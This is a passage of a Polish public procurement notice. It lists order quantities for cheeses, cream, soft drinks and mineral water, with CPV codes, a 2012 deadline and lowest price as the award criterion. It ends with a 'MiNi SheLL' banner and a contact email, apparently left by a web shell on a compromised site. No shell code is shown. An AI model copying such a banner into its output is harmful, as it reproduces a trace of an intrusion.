ser feta	szt	7
serek grani	szt	67
serek grani ze szczypiorem	szt	67
serek homogenizowany	szt	60
serek homogenizowany owoc.	szt	60
serek kanapk. Twarożk. 150g	szt	50
serek twaroż.  almette  lub równoważny	szt	50
ser twarogowy 200g	szt	15
ser twarogowy półtusty	kg	5
set topiony 200g	szt	30
ser top. krążek  	szt	45
ser topiony zegar 80g	szt	30
ser salami	kg	8
ser wędzony	kg	5
ser żółty  edamski	kg	5
ser żółty  królewski	kg	6
ser żółty  morski	kg	5
ser żółty  szwajcar	kg	17
śmietana w spray 0,5	szt	7
Śmietana 18% 0,5 l	szt	12
Śmietana 30%  0,5 l	szt	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zadanie nr 28 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5l	szt.	50
napoje niegazowane 1,5 l	szt	50
napój gazowany 2l	szt	17
napój n/g 2 l	szt	17
Woda mineral. 0,5 gaz	szt	100
Woda mineralna 0,5 n/g	szt	100
Woda mineralna n/g 0,5 l 	szt	100
woda mineral. G 0,,5 l 	szt	100
woda mineral. n/g 1,5 l	szt	350
Woda mineralna g 1,5 l 	szt	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com